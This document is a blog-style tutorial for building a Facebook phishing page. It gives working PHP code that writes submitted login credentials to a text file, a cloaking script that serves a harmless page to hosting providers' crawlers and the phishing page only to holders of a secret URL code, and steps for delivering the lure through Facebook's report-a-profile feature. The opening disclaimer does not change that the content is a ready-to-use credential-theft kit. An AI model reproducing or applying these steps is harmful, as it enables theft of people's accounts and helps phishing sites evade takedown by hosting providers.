Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, “How to create phishing page?”. If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk. What is phishing page? A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page. How to create? Visit the facebook page that you want to clone(clone means to make phising website). Save it (CTRL+S) via your browser. Choose save complete webpage while saving it via browser. Give name index while saving. (Dont use other name!)
Dont use other name! otherwise atlast facebook or other website will redirect the victim to reset the password saying that acoount hacked
Save it to a folder. Now, you should have one file named “index.htm” and a folder. We have to edit index.htm file. Edit it and search “action” without “”. You will get something like this if you are creating fake page of facebook, action=”https://www.facebook.com/login.php? login_attempt=1″ method=”post” , We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.
How to create login.php? Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php or you can download
Code:
<?php header(“Location: http://www.google.com”); $handle = fopen(“passes.txt”, “a”); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?>
You have to change http://www.google.com to the site url that you are cloning, in the upper code or in downloaded file for example, change it to http://www.facebook.com/ if you are cloning facebook. Now, you have your phishing page.
now we need to upload ALL this files to webhosting service refer to next article of mine or you can search in google for free web hosting service and upload these files in cpanels file manager
As web hosting service detects that its a phising website they will simply terminate the account so to save it do this thing
Host your phishing site without getting blocked
After i’v created the phishing page it’s got suspended within 5-6 hours. So it was a big challenge for me to host my phishing sites. But it was big a challenge until I’v learned some basics of php.
Here i will describe
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.
While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.
This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.
I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.
So how to bypass this??
Open any webpage you want to clone in your favorite browser.
Save the full page in .html.This step is almost common for every phishing attempt.
After saving the page you will get the page’s source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to “.jpg”
For example if you have “Login.html”. Just rename it to “Login.jpg”.
Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to “fake.jpg”
Create a new file called “phishing.php” and write following content into it.
<?php
$id = $_GET[“code”];
if ($id == “yourpasscode”) {
$myFile = “main.jpg”;
$fh = fopen($myFile, ‘r’);
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}
else{
$myFile1 = “fake.jpg”;
$fh1 = fopen($myFile1, ‘r’);
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>
In this code you just have to do following modification..
1>Change “yourpasscode” to your desired one.
2>Change “main.jpg” to the file name which one contain the real phishing web page’s code “Login.jpg”
3>Change “fake.jpg” to the file which file will contain the code of the fake page.
Now you have got the follwing files:
1)phishing.php (orginal phising page)
2)login.jpg
3)fake.jpg(fake page to be served if some one tried without the password earlier in this code it was “yourpasscode”)
4)A folder[Contains all the client side scripts and images for the real phishing page]
Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php
with your browser.
Here you will get the fake page which is not actual login page.
Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.
If you want to change the GET parameter “code” just modify the second line of the php script.
Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access “login.jpg” file they will get an invalid/corrupted image.
now its time to send the message to the victim facebook inbox mind it that you cant send message in inbox if you are not friend of victim so to do that first create a fake facebook profile and open the victims facebook account an your fake facebook profile
then click select report this acoount after that select this timeline is using a fake name then click continue
then select message to resolve this erase the previous message and type your message this message will go in inbox of victim account
have a great day